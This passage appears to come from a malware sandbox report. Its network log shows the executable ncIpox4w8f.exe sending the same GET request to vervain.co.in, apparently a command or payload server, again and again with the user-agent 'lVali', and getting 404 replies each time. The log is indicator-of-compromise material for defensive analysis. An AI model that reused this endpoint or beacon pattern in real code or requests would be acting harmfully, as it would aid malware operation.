                32 | 192.168.2.4 | 49801 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:13 UTC | 30 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:13 UTC | 31 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:13 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:13 UTC31INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                33 | 192.168.2.4 | 49802 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:14 UTC | 31 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:14 UTC | 31 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:14 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:14 UTC | 32 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                34 | 192.168.2.4 | 49803 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:16 UTC | 32 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:16 UTC | 32 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:16 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:16 UTC | 33 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                35 | 192.168.2.4 | 49804 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:20 UTC | 33 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:20 UTC | 33 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:20 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:20 UTC | 34 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                36 | 192.168.2.4 | 49805 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:21 UTC | 34 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:22 UTC | 34 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:22 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:22 UTC | 35 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                37 | 192.168.2.4 | 49806 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:23 UTC | 35 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:23 UTC | 35 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:23 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:23 UTC | 36 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                38 | 192.168.2.4 | 49807 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:24 UTC | 36 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:24 UTC | 36 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:24 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:24 UTC | 37 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                39 | 192.168.2.4 | 49808 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:25 UTC | 37 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:26 UTC | 37 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:25 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:26 UTC | 38 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                4 | 192.168.2.4 | 49759 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:08:26 UTC | 3 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:26 UTC | 4 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:26 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:08:26 UTC | 4 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                40 | 192.168.2.4 | 49809 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:26 UTC | 38 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:27 UTC | 38 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:27 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:27 UTC | 38 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                41 | 192.168.2.4 | 49810 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:28 UTC | 39 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:28 UTC | 39 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:28 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:28 UTC | 39 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                42 | 192.168.2.4 | 49811 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:29 UTC | 40 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:29 UTC | 40 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:29 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:29 UTC | 40 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                43 | 192.168.2.4 | 49814 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:30 UTC | 41 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:31 UTC | 41 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:31 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:31 UTC | 41 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                44 | 192.168.2.4 | 49815 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:31 UTC | 42 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:32 UTC | 42 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:32 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:32 UTC | 42 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                45 | 192.168.2.4 | 49816 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:33 UTC | 43 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:33 UTC | 43 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:33 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:33 UTC | 43 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                46 | 192.168.2.4 | 49817 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:34 UTC | 44 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:34 UTC | 44 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:34 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:34 UTC | 44 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                47 | 192.168.2.4 | 49818 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:36 UTC | 45 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:36 UTC | 45 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:36 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:36 UTC | 45 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                48 | 192.168.2.4 | 49819 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:39 UTC | 46 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:39 UTC | 46 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:39 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:39 UTC | 46 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                49 | 192.168.2.4 | 49820 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:40 UTC | 47 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:41 UTC | 47 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:40 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:41 UTC | 47 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                5 | 192.168.2.4 | 49760 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:08:27 UTC | 4 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:28 UTC | 4 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:28 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:08:28 UTC | 5 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                50 | 192.168.2.4 | 49821 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:41 UTC | 48 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:42 UTC | 48 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:42 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:42 UTC | 48 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                51 | 192.168.2.4 | 49822 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:42 UTC | 49 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:43 UTC | 49 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:43 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:43 UTC | 49 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                52 | 192.168.2.4 | 49823 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:43 UTC | 50 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:44 UTC | 50 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:44 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:44 UTC | 50 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                53 | 192.168.2.4 | 49824 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:45 UTC | 51 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:45 UTC | 51 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:45 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:45 UTC | 51 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                54 | 192.168.2.4 | 49825 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:46 UTC | 52 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:46 UTC | 52 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:46 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:46 UTC | 52 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                55 | 192.168.2.4 | 49826 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:47 UTC | 53 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:47 UTC | 53 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:47 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:47 UTC | 53 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                56 | 192.168.2.4 | 49827 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:09:48 UTC | 54 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
